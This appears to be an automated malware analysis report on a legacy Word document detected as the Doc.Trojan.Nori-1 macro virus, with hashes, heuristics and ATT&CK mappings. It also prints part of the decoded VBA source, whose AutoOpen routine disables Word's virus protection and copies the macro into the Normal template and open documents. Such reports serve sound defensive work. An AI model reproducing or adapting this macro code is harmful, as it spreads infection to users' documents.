Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d451222e70a1b0d6…

MALICIOUS

Office (OLE)

37.5 KB Created: 2002-11-14 12:31:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8af4630b9126ad15304e7fc023baa83e SHA-1: 268123fdddb9ca94bdde3c4d15b285d9b1dd4a63 SHA-256: d451222e70a1b0d6ab48181fc7e812fcdd8f9eff1a7936a8e5a7074c48a52b7e
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The presence of AutoOpen and Auto_Close VBA macros, along with a critical ClamAV detection for 'Doc.Trojan.Nori-1', strongly indicates malicious intent. The VBA macro 'ToN' attempts to create a file at 'c:\Iron.tmp', suggesting it's part of a payload delivery or execution chain. The document body content appears to be unrelated boilerplate text, likely used to obscure the malicious macro.

Heuristics 5

  • ClamAV: Doc.Trojan.Nori-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Nori-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11498 bytes
SHA-256: 03baf33b3b8c3095bee0c47c6fbabe6e45386871a0d5fc630ebf195f32c57874
Detection
ClamAV: Doc.Trojan.Nori-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Unit"
                                                                                                Sub ToN()
'Iron
                                                                                                On Error Resume Next
                                                                                                file = "c:\Iron.tmp"
                                                                                                Un = "Unit"

                                                                                                With NormalTemplate.VBProject.VBComponents
                                                                                                               '8
                                                                                                 NormalTemplate.Save
                                                                                                    Kill (file)
                                                                                                End With
                                                                                                End Sub
                                                                                                Sub ToA()
                                                                                                On Error Resume Next
                                                                                                file = "c:\Iron.tmp"
                                                                                                Un = "Unit"
                                                                                                With ActiveDocument.VBProject.VBComponents
                                                                                                                                          '18
                                                                                                ActiveDocument.SaveAs ActiveDocument.FullName
                                                                                                    Kill (file)
                                                                                                End With
                                                                                                End Sub
                                                                                                Sub AutoOpen()
                                                                                                On Error Resume Next
                                                                                                If Options.VirusProtection Then Options.VirusProtection = Not Options.VirusProtection
                                                                                                If Options.ConfirmConversions Then Options.ConfirmConversions = Not Options.ConfirmConversions
                                                                                                If Options.SaveNormalPrompt Then Options.SaveNormalPrompt = Not Options.SaveNormalPrompt
                                                                                                file = "c:\Iron.tmp"
                                                                                                Un = "Unit"
                                                                                                If NormalTemplate.VBProject.VBComponents.Item(Un).CodeModule.Lines(2, 1) <> "'Iron" Then
                                                                                                ActiveDocument.VBProject.VBComponents(Un).Export (file)
                                                                                                With Ac
... (truncated)